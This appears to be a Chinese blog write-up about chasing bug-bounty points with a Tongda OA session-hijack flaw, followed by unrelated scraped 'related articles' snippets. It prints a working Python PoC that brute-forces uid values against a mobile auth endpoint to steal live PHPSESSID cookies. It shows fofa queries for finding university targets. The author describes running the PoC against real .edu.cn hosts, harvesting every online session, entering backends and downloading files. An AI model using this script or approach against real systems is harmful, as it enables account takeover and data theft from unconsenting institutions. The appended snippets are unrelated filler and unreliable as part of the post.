全文小结

  • 1.首先洞没刷到肯定不舒服的,但这种就是比消息,谁拿到的消息快,谁刷的早,就有分,晚的就重复。(好几个3号凌晨通宵刷,我的妈)
  • 2. 向这种在线洞,本地复现材料edu不认。好之为之,40个洞一个没过。
  • 3. 3. fofa找到资产挺多的,但不全,起码有3成不在里面。
  • 4. 4.自己审洞吧,没事别折腾,空欢喜一场。。

3/3号一天早上,需要提早上课,懒洋洋来到教室。

刷刷公众号,看到一个眼前一亮的文章: 某OA系统在线登录漏洞,一看时间是刚发的,突然想起我那可怜的edu rank,感觉这个洞有点说法。
想着回到寝室做一波复现后刷一波,。。。。
回到寝室忘记了。。。睡一觉起来记起还有个这玩意

开始复现,通过作者的解释,得知是登录接口的问题

然后滑到下面看到作者提供了poc。

看到作者没有给附件后**,感觉这个poc可能要调试调试**,然后来了一波复制粘贴,复制到本地后,运行出现各种语法错误,内容大至忘记了,比较多的是 if “RELOGIN” 上面图的第22行,寻思着也没出现缩进,为毛报错了。贴到vscode发现前面的title()连静态审查都过不了

后面灵光一闪: 网页格式既然有问题,那我手工粘贴检查不就行了??
先导包,导入上面的def title() 函数,很快啊,就做完了,成功遍历。
当时图大致这样

抓包发现还存在一个key_DATA参数,直接复制PHPSESSID改包会失败,说明服务端对key做了验证,只能用脚本跑是否存在漏洞-访问接口(放回一个key和在线的SESSID),访问./general/后台 就能登录。

很快啊,本地做完复现后,就上fofa开始干,
在资产库找到指纹:app=“TDXK-通达OA”
直接 app=“TDXK-通达OA”&& host=".edu.cn"

看到结果挺多了,随便试试这个接口,

噢? 这tm不就有洞嘛? 果然是0day,在看看别的

看了10来个,发现都存在这个洞,感觉发了。于是乎:构思这种在线洞如何提交漏洞证明:
我的思路是:只要访问接口存在RELOGIN(用户不在线)或者空(用户在线),
提交一份本地复现的证明,应该就能过。

说干就干,很快啊,就刷了30来个

不得不说,fofa的资产是很全。。最后看了下大概有40来个。
算了一下rank可能70-80,这难道就是0day嘛?

第二天回寝室后,打开edu,看到好几个人也在刷,但没看到我。。

有一种不好的预感。。。。
果然,劳资翻车了

我tm楞了一会,点开详情

这tm在线洞需要用户在线才能算洞,我tm直接蛋疼,记得昨天还交了个在线的

重复,还没给过。。。。
这车翻的我找不着头脑??

1.那首页上好几页的洞都是登录的???
2.为毛他们都过了??

在群里翻了消息,看到一个公众号发了篇文章,具体是啥忘了,找到个脚本
说是 那个接口/mobile/auth_mobi.php?isAvatar=1&uid=&P_VER=0 这里的uid表示用户在库里的session。我tm心态直接爆炸,我说他们的在线用户怎么来的。


好吧,在心态炸裂后,想着能不能找几个弥补损失,40个洞,能捡漏个2-3个,还是不亏的。
用他的脚本,这里有个坑,url = sys.argv[1] 这里不能放在IDE运行,摸索一会后 python3 poc1.py http://*.edu.cn 大致这样可以跑,

import requests
from bs4 import BeautifulSoup
import sys
import reurl = sys.argv[1]
for i in range(1,10000):try :vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"resp = requests.get(vuln_url)soup = BeautifulSoup(resp.text,'html.parser')if 'RELOGIN' in soup.get_text():print("不存在")else:PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))print('uid='+str(i)+"在线"+"对应的COOKIE值是:PHPSESSID="+str(PHPSESSION[0]))#  breakexcept:break

原代码的意思是找到存在的SESSID就退出,但找了几个洞后,好不容易找到几个在线的,遗憾的是,某哥已经刷过了。。
心想着后台有没啥重要个人信息,交个弱口令也行,所以吧break注释了,这样就会吧全部SESSID在线都跑完。


转了几圈下了几个文件,感觉也没啥利用价值,无奈,放掉这个洞了。。

抱着不甘心的想法,看到edu那几个一块刷的具体,看到好几个刷的比较早,差不多一个人10来个洞,30来rank,没有我想的一把梭情况出现

做个小结:

1.首先洞没刷到肯定不舒服的,但这种就是比消息,谁拿到的消息快,谁刷的早,就有分,晚的就重复。(好几个3号凌晨通宵刷,我的妈)

2. 向这种在线洞,本地复现材料edu不认。好之为之,40个洞一个没过。

3. 3. fofa找到资产挺多的,但不全,起码有3成不在里面。

4. 4.自己审洞吧,没事别折腾,空欢喜一场。。

挖掘厂商SRC-记一次某OA在线登录洞edu不认账相关推荐

  1. 弘玑Cyclone成功入围《2022爱分析·流程挖掘厂商全景报告》,流程智能产品受到广泛关注

    8月25日,国内知名数字化市场研究咨询机构爱分析正式发布<2022爱分析 ·  流程挖掘厂商全景报告>(以下简称"报告").弘玑Cyclone作为超自动化领导者,其自主 ...

  2. ExtJs学习篇---OA系统登录界面设计

    今天在网上看到了一个案例,于是就跟着练习了下,也就当作这几天学习的一个应用吧! 部署图如下: login.js //Ext.BLANK_IMAGE_URL是空白图片的地址 Ext.BLANK_IMAG ...

  3. 基于SSM+SpringBoot+MySQL+Bootstrap的OA在线办公自动化管理系统

    登陆首页 部门管理 职位管理 考勤报表 新建流程 通知管理 邮件管理 任务管理 日程管理 部门 笔记 通讯录 讨论区 技术描述 开发工具: Idea/Eclipse 数据库: mysql Jar包仓库 ...

  4. 系统OA在线演示和下载地址

    系统OA在线演示地址            下载地址 通达oa                http://www.tongda2000.com/download/ 新思创oa             ...

  5. 记一次 ftp 可以正常登录,但是输入ls dir 命令卡死的问题

    记一次 ftp 可以正常登录,但是输入ls dir 命令卡死的问题 最近应客户方在服务器上安装ftp服务.安装配置完成后cmd,FileZilla均可以访问,连浏览都可以用,可是用别的服务器正常登录上 ...

  6. 游戏厂商出海记:韩国内卷严重,其它地区占到什么地盘?

    在游戏圈,韩国是个绕不开的存在,这一方面是由于PUBG等知名韩国游戏的带动作用,另一方面韩国也属于东亚文化圈,国产游戏企业出海时往往将这里作为重要目的地. 9月,一款二次元游戏在韩国的异军突起引发了广 ...

  7. 重生之我是赏金猎人(三)-无脑挖掘某SRC getshell

    0x00 项目背景 该系列旨在分享自己和团队在SRC.项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸. 该系列首发github:https://github ...

  8. oa系统登录后几分钟自动退出_2020版OA办公系统正式上线运行!

    关于2020版OA办公系统 正式上线运行的通知 各学院,校机关各部门.各直属单位: 2020版OA办公系统自10月7日上线试运行以来,广泛听取了学院部门的意见建议,经过功能调整优化,现已具备上线运行条 ...

  9. 泛微OA单点登录帆软报表

    帆软提供很多种单点登录有很多种方式,基于不开发的前提,可以使用URL登录插件的方式,即使用get方式将用户名密码发送给帆软服务器进行身份验证. 泛微端配置: 泛微OA的版本: 8.100.0531,提 ...

最新文章

  1. 第十二届全国大学生智能汽车竞赛获奖名单
  2. linux 内核线程与普通进程的区别
  3. vim支持python/dyn,但has返回0
  4. 项目忙还要过软考,您需要简练!
  5. C++ SYN攻击源码
  6. Ubuntu2004,虚拟机中使用,解决系统图标变大变小以及分辨率降低问题
  7. Squared Permutation(线段树)
  8. Akka2使用探索2(Con?guration)
  9. 界址点号_界址点及四至优化
  10. C# 操作List集合报错:集合被修改,枚举操作可能不会执行(Collection was modified, enumeration operation may not execute)
  11. 闲说HeartBeat心跳包和TCP协议的KeepAlive机制
  12. 转载文章:Microsoft 将僵尸网络威胁智能分析程序引入云中以提供近实时数据
  13. Java——can U do
  14. sudo gem install cocoapods
  15. python表白代码大全简单-程序员python表白代码
  16. er studio mysql_解决ER\Studio无法生成mysql列注释问题
  17. 关于需求跟踪矩阵的6个问题
  18. 微信小程序创建过程(具体步骤)
  19. linux下的护眼软件
  20. Codeforces Gym 100015C City Driving 离线LCA

热门文章

  1. 数据库原理及应用教程(第4版|微课版)陈志泊-SQL Server2012综合练习
  2. mysql卸载报错2503_MySQL之卸载重装等问题
  3. [渝粤题库]陕西师范大学《幼儿保健学》作业
  4. Python实现字母验证码图片
  5. 不可不知的USB2.0/USB3.0/HDMI静电防护方案
  6. Ocelot的使用(结合Consul实现负载均衡)
  7. 华为电脑管家傻瓜一键安装版 win10
  8. python程序员推荐笔记本电脑_2020程序员笔记本推荐?
  9. Android——Android逆向工具
  10. 影像组学matlab,【影像组学】影像组学研究进展介绍